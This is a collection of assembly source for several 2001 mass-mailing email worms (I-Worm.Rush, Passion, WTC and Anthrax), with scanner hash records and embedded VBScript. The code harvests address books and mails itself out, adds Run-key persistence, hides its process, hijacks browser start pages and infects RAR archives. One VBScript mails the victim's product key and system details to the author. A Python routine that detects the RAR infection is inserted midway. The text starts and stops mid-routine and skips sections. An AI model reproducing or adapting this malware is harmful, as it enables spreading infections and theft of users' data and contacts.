xchg eax,esi
push 0
push ebx
callx GetFileSize
cmp eax,3
jbe F3
scan_file:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_file
call send_mail
jmp scan_file
entr2: xor al,al
stosb
pop edi
jmp scan_file
f_mail:
scan_window:mov counter,0
win1: inc counter
cmp counter,1000000
je end_w
@pushsz "Norton AntiVirus"
push 00h
callx FindWindowA
test eax,eax
jz win2
jmp change_nav
win2: @pushsz "System Properties"
push 00h
callx FindWindowA
test eax,eax
jz win3
jmp show_window
win3: @pushsz "Microsoft Home Page - Microsoft Internet Explorer"
push 00h
callx FindWindowA
test eax,eax
jz win1
jmp display_message
change_nav:
mov edi,eax
@pushsz "Norton Virus : W32.Norton.Worm@mm"
push edi
callx SetWindowTextA
jmp win1
show_window:
mov edi,eax
push 2
push edi
callx ShowWindow
jmp win1
display_message:
mov edi,eax
push 10h
@pushsz "Microsoft Internet Explorer"
@pushsz "You don't have access to this page"
push 00h
callx MessageBoxA
push 0
push edi
callx ShowWindow
jmp win1
end_w: push 00h
callx ExitProcess
hide_worm:
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
internet_page:
pushad
call diff_val
db "Search Page",0
db "Start Page",0
db "Local Page",0
diff_val:
pop esi
push 3
pop ecx
page_loop:
push ecx
push 32
@pushsz "http://www.petik.fr.fm"
push 1
push esi
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
callx SHSetValueA
@endsz
pop ecx
loop page_loop
popad
ret
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd namefrom
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
signature db "I-Worm.Rush",00h
origine db "A worm made in France",00h
author db "Written by PetiK - 2001",00h
end start
end
File Rush.exe received on 05.16.2009 19:29:11 (CET)
Additional information
File size: 5632 bytes
MD5...: 7b523f10e09815dd401a4db17a9813c5
SHA1..: b7f647c90aeb06ee2ce145c152d09bf67966559f
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Passion
Author : PetiK
Date : September 3rd - September 8th
Size : 5120 byte (compressed with the UPX tool)
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
callx GetModuleFileNameA
reg_save:
push 8
push edi
push 1
@pushsz "MsVbdll"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
check_connect:
push 0
push offset connected
callx InternetGetConnectedState
dec eax
jnz exec_other
system_counter:
callx GetTickCount
xor edx,edx
mov ecx,10
div ecx
cmp edx,2
jne check_connect
call change_page
chec_reg:
push offset regDisp
push offset regResu
push 0
push 0F003Fh
push 0
push 0
push 0
@pushsz "Software\[Check Passion]"
push 80000001h
callx RegCreateKeyExA
push [regResu]
callx RegCloseKey
cmp [regDisp],1
jne vbs_file
search_info:
push 50
push offset passion_txt
callx GetWindowsDirectoryA
@pushsz "\Passion.txt"
push offset passion_txt
callx lstrcat
call CreateDate
call CreateTime
push offset passion_txt
push offset date
@pushsz "Date"
@pushsz "Date et Heure"
callx WritePrivateProfileStringA
push offset passion_txt
push offset time
@pushsz "Heure"
@pushsz "Date et Heure"
callx WritePrivateProfileStringA
push 50
push offset Systemini
callx GetWindowsDirectoryA
@pushsz "\Win.ini"
push offset Systemini
callx lstrcat
push offset Systemini
push 20
push offset org_pays
push offset default
@pushsz "sCountry"
@pushsz "intl"
callx GetPrivateProfileStringA
push offset passion_txt
push offset org_pays
@pushsz "Pays"
@pushsz "Information systême"
callx WritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message2
push eax
push [hMapi]
callx MAPISendMail
vbs_file:
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\passion.vbs"
callx CreateFileA
xchg edi,eax
push 0
push offset octets
push vbssize
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\passion.vbs"
callx WinExec
push 1000
callx Sleep
@pushsz "C:\passion.vbs"
callx DeleteFileA
start_scan:
mov edi,offset allmail
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"llA\"
stosd
mov eax,"liaM"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
open_scan_mail:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset allmail
callx CreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
callx MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
callx GetFileSize
cmp eax,3
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:
exec_other:
push 10000
callx Sleep
push 0
push offset copy_worm
callx WinExec
end_w: push 00h
callx ExitProcess
hide_worm:
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
change_page:
pushad
call @value
db "Default_Page_URL",0
db "Search Page",0
db "Start Page",0
db "Local Page",0
@value: pop esi
push 4
pop ecx
p_loop:
push ecx
push 32
@pushsz "http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm"
push 1
push esi
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
callx SHSetValueA
@endsz
pop ecx
loop p_loop
popad
ret
CreateDate Proc
pushad
mov edi,offset date
push 32
push edi
@pushsz "ddd, dd MMM yyyy"
push 0
push 0
push 9
callx GetDateFormatA
popad
ret
CreateDate EndP
CreateTime Proc
pushad
mov edi,offset time
push 32
push edi
@pushsz "HH:mm:ss"
push 0
push 0
push 9
callx GetTimeFormatA
popad
ret
CreateTime EndP
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [hMapi]
callx MAPISendMail
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
date db 17 dup (?)
time db 9 dup (?)
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
Message2 dd ?
dd offset subject2
dd offset body2
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo2
dd 1
dd offset Attach2
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
MsgTo2 dd ?
dd 1
dd ?
dd offset mail_me
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
Attach2 dd ?
dd ?
dd ?
dd offset passion_txt
dd ?
dd ?
vbsd: db 'On Error Resume Next',0dh,0ah
db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt")',0dh,0ah
db 'txt.Close',0dh,0ah
db 'For Each M In chan.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O=1 To M.AddressEntries.Count',0dh,0ah
db 'Set P=M.AddressEntries(O)',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt",8,true)',0dh,0ah
db 'txt.WriteLine P.Address',0dh,0ah
db 'txt.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt",8,true)',0dh,0ah
db 'txt.WriteLine "#"',0dh,0ah
db 'txt.Close',0dh,0ah
vbssize equ $-vbsd
signature db "I-Worm.Passion",00h
author db "Coded by PetiK - 2001",00h
end start
end
File Passion.exe received on 05.16.2009 19:28:44 (CET)
Additional information
File size: 5120 bytes
MD5...: 0a4e37025fec58713036fa88a28a070e
SHA1..: d85aa3be13c031e015b7378c7cb1951fb7ba2efa
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.WTC (aka:I-Worm.Super -> It was the first worm's name.)
Author : PetiK
Date : September 11th (A great day that we don't forget all around the world) - October 11th
Size : 8704 byte (compressed with the UPX tool)
It creates C:\wrm.vbs. This script collects all e-mail addresses from the WAB into the file
C:\email.mel; the worm waits 2 sec. and then deletes the VBS file.
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
push 0
push edi
push esi
api CopyFileA
push 15
push edi
push 1
@pushsz "Visual Debugger"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
special_folder:
pushad
push 0
push 5
push offset personal
push 0
api SHGetSpecialFolderPathA
push offset personal
api SetCurrentDirectoryA
call get_worm_crc
find_first_rar:
push offset Search
@pushsz "*.rar"
api FindFirstFileA
inc eax
je find_close_rar
dec eax
mov [hSearch],eax
i_r: call infect_rar
push offset Search
push [hSearch]
api FindNextFileA
test eax,eax
jne i_r
find_close_rar:
push [hSearch]
api FindClose
end_virtual:
push 8000h
push 0
push [worm_main]
api VirtualAlloc
end_all_rar:
popad
call vbs_file
push 2 or 20h
@pushsz "C:\email.mel"
api SetFileAttributesA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
open_scan_mail:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "C:\email.mel"
api CreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
api CreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,3
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"%"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:
start_page:
pushad
mov edi,offset sinet
call sinet_size
dd 160
sinet_size:
push edi
call reg
dd 1
reg:
@pushsz "Start Page"
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
api SHGetValueA
call @web
db "http://stcom.net/",0
db "http://stcom.net/default2.htm",0
db "http://stcom.net/qoqazfr",0
db "http://stcom.net/kavkoz",0
db "http://stcom.net/falestine",0
db "http://stcom.net/oulamah",0
db "http://stcom.net/Oulamah",0
db "http://stcom.net/An-Nissa",0
db "http://stcom.net/ahghanistan",0
db "http://www.alesteqlal.com/",0
@web:
pop esi
push 10
pop ecx
w_loop:
push ecx
push esi
push offset sinet
api lstrcmp
test eax,eax
jnz continue
call alert_fbi
jmp end_web
continue:
@endsz
pop ecx
loop w_loop
end_web:
popad
end_worm:
push 0
api ExitProcess
hide_worm:
pushad
@pushsz "Kernel32.dll"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess"
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
mess_worm:
pushad
push offset SystemTime
api GetSystemTime
cmp [SystemTime.wDay],04h
jne end_mess
push 40h
@pushsz "I-Worm.Super coded by PetiK"
call @txt
db "Because of the different terrorism acts in the USA",0dh,0ah
db "I don't will destroy your computer.",0dh,0ah,0dh,0ah
db "If you have some informations about the authors or Ben Laden,",0dh,0ah
db 9,"PLEASE CONTACT THE FBI",0
@txt:
push 0
api MessageBoxA
end_mess:
popad
ret
get_worm_crc Proc
pushad
push 0
push 80h
push 3
push 0
push 0
push 80000000h
push offset copy_worm
api CreateFileA
inc eax
je end_all_rar
dec eax
mov [hFile],eax
push 0
push eax
api GetFileSize
mov [filesize],eax
mov [RARCompressed],eax
mov [RAROriginal],eax
push eax
push 4
push 1000h or 2000h
push eax
push 0
api VirtualAlloc
test eax,eax
pop edx
je end_file
xchg eax,ebx
mov [worm_main],ebx
push edx
push 0
push offset tmp
push edx
push ebx
push [hFile]
api ReadFile
pop edi
mov esi,ebx
call CRC32
mov [RARCRC32],eax
end_file:
push [hFile]
api CloseHandle
popad
ret
get_worm_crc EndP
CRC32 Proc
push ecx
push edx
push ebx
xor ecx,ecx
dec ecx
mov edx,ecx
nxt_byte_crc:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
nxt_bit_crc:
shr bx,1
rcr ax,1
jnc no_crc
xor ax,08320h
xor bx,0EDB8h
no_crc: dec dh
jnz nxt_bit_crc
xor ecx,eax
xor edx,ebx
dec edi
jne nxt_byte_crc
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
ret
CRC32 EndP
infect_rar Proc
pushad
push offset Search.cFileName
api GetFileAttributesA
cmp eax,1
je end_inf
push 0
push 80h
push 3
push 0
push 0
push 80000000h or 40000000h
push offset Search.cFileName
api CreateFileA
inc eax
je end_inf
dec eax
xchg eax,ebx
push 2
push 0
push 0
push ebx
api SetFilePointer
push 0
push offset tmp
push end_RAR-RARHeader
call end_RAR
RARHeader:
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw end_RAR-RARHeader
RARCompressed dd 2000h
RAROriginal dd 2000h
RAROS db 0
RARCRC32 dd 0
RARFileDateTime dd 12345678h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw end_RAR-RARName
RARAttrib dd 0
RARName db 'SUPER.EXE'
end_RAR:push ebx
api WriteFile ;write the rar header
push 0
push offset tmp
push [filesize]
push [worm_main]
push ebx
api WriteFile ;write the worm
push ebx
api CloseHandle ;close the file
push 1
push offset Search.cFileName
api SetFileAttributesA ;set already-infected mark
end_inf:popad
ret
infect_rar EndP
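Read together, CRC32 Proc, get_worm_crc and infect_rar do one thing: they append a RAR 2.x FILE_HEAD (type 74h, flags 8000h, method 30h = stored, name SUPER.EXE) followed by the worm image to the end of an existing archive, with FILE_CRC computed over the payload but RARHeaderCRC left at zero, and then set the read-only attribute as the already-infected mark. The Python below is an added example written for this page, not PetiK's code: it reimplements the bit-serial CRC-32 the same way the assembly does (table entry built one bit at a time, then folded in), checks it against zlib, and walks a RAR 2.x block chain to flag an appended stored SUPER.EXE entry or any file header whose HEAD_CRC does not verify. The archive it scans is constructed inline; the two-part rule (that name, or a bad HEAD_CRC) is an assumption for the example, not a published signature, and a bad HEAD_CRC will also fire on genuinely truncated or corrupted archives.

```python
"""Detect the stored SUPER.EXE entry that I-Worm.Super appends to RAR 2.x archives."""
import struct
import zlib

RAR_MARKER = b"Rar!\x1a\x07\x00"   # marker block: HEAD_CRC 0x6152, type 0x72, flags 0x1a21, size 7
MARK_HEAD, MAIN_HEAD, FILE_HEAD = 0x72, 0x73, 0x74
LHD_LONG_BLOCK = 0x8000            # the 8000h in RARFlags: PACK_SIZE bytes of data follow the header
METHOD_STORE = 0x30                # the 30h in RARMethod: payload is not compressed


def crc32_like_worm(data: bytes) -> int:
    """Bit-serial CRC-32, reflected polynomial 0xEDB88320, structured like the
    worm's CRC32 Proc: per byte, build the table entry for (crc ^ byte) & 0xFF
    one bit at a time (the bx:ax loop), then xor it into the shifted crc (dx:cx)."""
    crc = 0xFFFFFFFF                  # xor ecx,ecx / dec ecx / mov edx,ecx
    for byte in data:
        entry = (crc ^ byte) & 0xFF   # lodsb / xor al,cl
        crc >>= 8                     # mov cl,ch / mov ch,dl / mov dl,dh, dh ends the bit loop at 0
        for _ in range(8):            # shr bx,1 / rcr ax,1 / jnc / xor with EDB8:8320
            carry = entry & 1
            entry >>= 1
            if carry:
                entry ^= 0xEDB88320
        crc ^= entry                  # xor ecx,eax / xor edx,ebx
    return crc ^ 0xFFFFFFFF           # not edx / not ecx


def matches_zlib(data: bytes) -> bool:
    """Sanity check: the worm's routine is plain CRC-32, so it must agree with zlib."""
    return crc32_like_worm(data) == zlib.crc32(data)


def build_block(body: bytes, head_crc=None) -> bytes:
    """Prefix a block body (everything after HEAD_CRC) with HEAD_CRC, the low 16 bits
    of CRC-32 over those bytes; pass head_crc explicitly to write a wrong value."""
    if head_crc is None:
        head_crc = crc32_like_worm(body) & 0xFFFF
    return struct.pack("<H", head_crc) + body


def build_file_header(name: bytes, data: bytes, head_crc=None) -> bytes:
    """A FILE_HEAD laid out exactly like the worm's RARHeader struct: 32 fixed bytes
    plus the name, stored, with FILE_CRC computed over the payload."""
    body = struct.pack("<BHHIIBIIBBHI",
                       FILE_HEAD, LHD_LONG_BLOCK, 32 + len(name),
                       len(data), len(data),      # RARCompressed, RAROriginal
                       0,                          # RAROS
                       crc32_like_worm(data),      # RARCRC32
                       0x12345678,                 # RARFileDateTime, the constant the worm uses
                       0x14, METHOD_STORE,         # RARNeedVer, RARMethod
                       len(name), 0) + name        # RARFNameSize, RARAttrib, RARName
    return build_block(body, head_crc)


def parse_rar_blocks(buf: bytes):
    """Yield (offset, head_type, header_bytes, data_size, crc_ok) for each block.
    The marker block's HEAD_CRC is not a real CRC (its bytes spell 'Rar!'), so it is skipped."""
    if not buf.startswith(RAR_MARKER):
        raise ValueError("not a RAR 2.x archive")
    pos = 0
    while pos + 7 <= len(buf):
        head_crc, head_type, flags, head_size = struct.unpack_from("<HBHH", buf, pos)
        if head_size < 7 or pos + head_size > len(buf):
            break
        header = buf[pos:pos + head_size]
        data_size = 0
        if flags & LHD_LONG_BLOCK and head_size >= 11:
            data_size = struct.unpack_from("<I", header, 7)[0]
        crc_ok = head_type == MARK_HEAD or (crc32_like_worm(header[2:]) & 0xFFFF) == head_crc
        yield pos, head_type, header, data_size, crc_ok
        pos += head_size + data_size


def find_super_entries(buf: bytes):
    """Flag file headers that look like the worm's appended entry: a SUPER.EXE member,
    or any FILE_HEAD whose HEAD_CRC fails (the worm never fills RARHeaderCRC)."""
    hits = []
    for off, head_type, header, data_size, crc_ok in parse_rar_blocks(buf):
        if head_type != FILE_HEAD or len(header) < 32:
            continue
        method = header[25]                                   # RARMethod
        name_size = struct.unpack_from("<H", header, 26)[0]   # RARFNameSize
        name = header[32:32 + name_size]                      # RARName
        if name.upper() == b"SUPER.EXE" or not crc_ok:
            hits.append({"offset": off, "name": name, "method": method,
                         "crc_ok": crc_ok, "size": data_size})
    return hits


def make_sample(infected: bool) -> bytes:
    """Constructed archive for the example: marker, main header, one stored text member
    and, if infected, the worm-style entry appended at the end with HEAD_CRC left at 0."""
    main = build_block(struct.pack("<BHHHI", MAIN_HEAD, 0, 13, 0, 0))
    readme = b"constructed sample member, not a real archive\n"
    buf = RAR_MARKER + main + build_file_header(b"readme.txt", readme) + readme
    if infected:
        payload = b"MZ" + b"\x00" * 62 + b"constructed stand-in for the worm body"  # not a real PE
        buf += build_file_header(b"SUPER.EXE", payload, head_crc=0) + payload
    return buf


if __name__ == "__main__":
    for hit in find_super_entries(make_sample(True)):
        print(hit)
```

Because the worm appends rather than rewrites, a clean archive that gets infected keeps all of its original blocks intact; the hit's offset equals the length of the archive before infection, which is also where a cleaner would truncate.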
vbs_file Proc
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\wrm.vbs"
api CreateFileA
xchg eax,ebx
push 0
call @tmp
dd ?
@tmp:
push e_vbs - s_vbs
call e_vbs
s_vbs: db 'On Error Resume Next',CRLF
db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set O=CreateObject("Outlook.Application")',CRLF
db 'Set M=O.GetNameSpace("MAPI")',CRLF
db 'Set mel=f.CreateTextFile("C:\email.mel")',CRLF
db 'mel.Close',CRLF
db 'For Each N In M.AddressLists',CRLF
db 'If N.AddressEntries.Count <> 0 Then',CRLF
db 'For c=1 To N.AddressEntries.Count',CRLF
db 'Set P=N.AddressEntries(c)',CRLF
db 'Set mel=f.OpenTextFile("C:\email.mel",8,true)',CRLF
db 'mel.WriteLine P.Address',CRLF
db 'mel.Close',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'Set mel=f.OpenTextFile("C:\email.mel",8,true)',CRLF
db 'mel.WriteLine "%"',CRLF
db 'mel.Close',CRLF
e_vbs: push ebx
api WriteFile
push ebx
api CloseHandle
push 1
@pushsz "wscript C:\wrm.vbs"
api WinExec
push 5000
api Sleep
@pushsz "C:\wrm.vbs"
api DeleteFileA
popad
ret
vbs_file EndP
send_mail:
xor eax,eax
push eax
push eax
push offset MsgWrm
push eax
push [hMAPI]
api MAPISendMail
ret
alert_fbi:
@pushsz "C:\information.txt"
push offset sinet
@pushsz "Start Page of MSIE"
@pushsz "Information about the suspect written by the Worm"
api WritePrivateProfileStringA
push 50
push offset Systemini
api GetWindowsDirectoryA
@pushsz "\Win.ini"
push offset Systemini
api lstrcat
push offset Systemini
push 20
push offset org_pays
push offset default
@pushsz "sCountry"
@pushsz "intl"
api GetPrivateProfileStringA
@pushsz "C:\information.txt"
push offset org_pays
@pushsz "Country of the suspect"
@pushsz "Information about the suspect written by the Worm"
api WritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset MsgFbi
push eax
push [hMAPI]
api MAPISendMail
push 30000
api Sleep
@pushsz "C:\information.txt"
api DeleteFileA
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
rar_worm db 50 dup (0)
MsgFbi dd ?
dd offset subjectfbi
dd offset bodyfbi
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgToFbi
dd 1
dd offset AttachFbi
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgToFbi dd ?
dd 1
dd ?
dd offset mailfbi
dd ?
dd ?
AttachFbi dd ?
dd ?
dd ?
dd offset infofbi
dd ?
dd ?
MsgWrm dd ?
dd offset subjectwrm
dd offset bodywrm
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgToWrm
dd 1
dd offset AttachWrm
MsgToWrm dd ?
dd 1
dd ?
dd offset mail_addr
dd ?
dd ?
AttachWrm dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
signature db "I-Worm.WTC",00h
author db "Coded by PetiK - 2001",00h
end start
end
SUPER.VBS
On Error Resume Next
Set ws=CreateObject("WScript.Shell")
verif=ws.RegRead("HKLM\Software\Microsoft\SuperWorm\")
If verif <> "send" Then
ro1=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ro2=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
pk=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
pi=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
ver=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
vern=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
sp=ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
ld=ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")
Set OA=CreateObject("Outlook.Application")
Set EM=OA.CreateItem(0)
EM.To="petik@multimania.com"
EM.BCC = "support@microsoft.com; support@avx.com; nimda-request@sophos.com"
EM.Subject="I am infected by I-Worm.Super !!"
body="My name is " & ro1 & ","
body = body & VbCrLf & "I was infected by I-Worm.Super :-("
body = body & VbCrLf & "It was on "& date & " at " & time & "."
body = body & VbCrLf & ""
body = body & VbCrLf & "If you want some informations about me :"
body = body & VbCrLf & "My registered owner : " & ro1
body = body & VbCrLf & "My registered organization : " & ro2
body = body & VbCrLf & "My Product Key : " & pk
body = body & VbCrLf & "My Product Indentification : " & pi
body = body & VbCrLf & "My version of Windows : " & ver & " " & vern
body = body & VbCrLf & "My start page of MSIE : " & sp
body = body & VbCrLf & "My country : " & ld
body = body & VbCrLf & ""
body = body & VbCrLf & "Please help me !"
body = body & VbCrLf & "Thank you very much."
EM.Body=body
EM.DeleteAfterSubmit=True
EM.Send
ws.RegWrite "HKLM\Software\Microsoft\SuperWorm\","send"
End If
File WTC.exe received on 05.16.2009 20:03:13 (CET)
Additional information
File size: 8704 bytes
MD5...: 2fb45484acdd0ec3a4f7f199b13e2262
SHA1..: 657559e72ba0fb47cbe296be5f8c8d01c1164636
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Anthrax (aka : I-Worm.Fi)
Author : PetiK
Date : October 11th - November 6th
Size : 6144 byte (compiled with UPX tool)
-C:\mirc
-C:\mirc32
-C:\progra~1\mirc
-C:\progra~1\mirc32
To spread, it uses MAPI with the first 10 email addresses found in the WAB.
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start:
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA ; esi = name of file
push 1
push edi
push esi
api CopyFileA ; copy itself
test eax,eax
je end_twin ; already copy ??
push 20
push edi
push 1
@pushsz "Microsoft System"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA ; regedit
call debug
e_sr:
call hide_worm
call create_url
call spread_mirc
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
spread_wab:
pushad
srch_wab:
mov edi,offset wab_path
push offset wab_size
push edi
push offset reg
push 0
@pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" ; The name of WAB file
push 80000001h
api SHGetValueA
push 0
push 0
push 3
push 0
push 1
push 80000000h
push offset wab_path
api CreateFileA
inc eax
je end_srch_wab
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_wab1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_wab2
xchg eax,esi
mov verif,0
d_scan_mail:
call @smtp
db 'SMTP',00h,1Eh,10h,56h,3Ah ; the string what we want to find
@smtp:
pop edi
s_scan_mail:
pushad
push 9
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop s_scan_mail
end_wab3:
push esi
api UnmapViewOfFile
end_wab2:
push ebp
api CloseHandle
end_wab1:
push ebx
api CloseHandle
end_srch_wab:
popad
end_worm:
push 0
api ExitProcess
push 0
push 80h
push 3
push 0
push 0
push 40000000h or 80000000h
@pushsz "\\.\SICE" ; SOFTICE driver win98
api CreateFileA
inc eax
jne kill
push 0
push 80h
push 3
push 0
push 0
push 40000000h or 80000000h
@pushsz "\\.\NTICE" ; SOFTICE driver winNT/2k
api CreateFileA
inc eax
jne kill
popad
ret
debug EndP
hide_worm Proc
pushad
@pushsz "KERNEL32.dll"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
spread_mirc Proc
push 50
push offset mircspread
api GetSystemDirectoryA
@pushsz "\MsSys32.exe"
push offset mircspread
api lstrcat
pushad
call @mirc
db 'C:\mirc\script.ini',0
db 'C:\mirc32\script.ini',0 ; spread with mIRC. Thanx to Microsoft.
db 'C:\progra~1\mirc\script.ini',0
db 'C:\progra~1\mirc32\script.ini',0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov [hmirc],eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
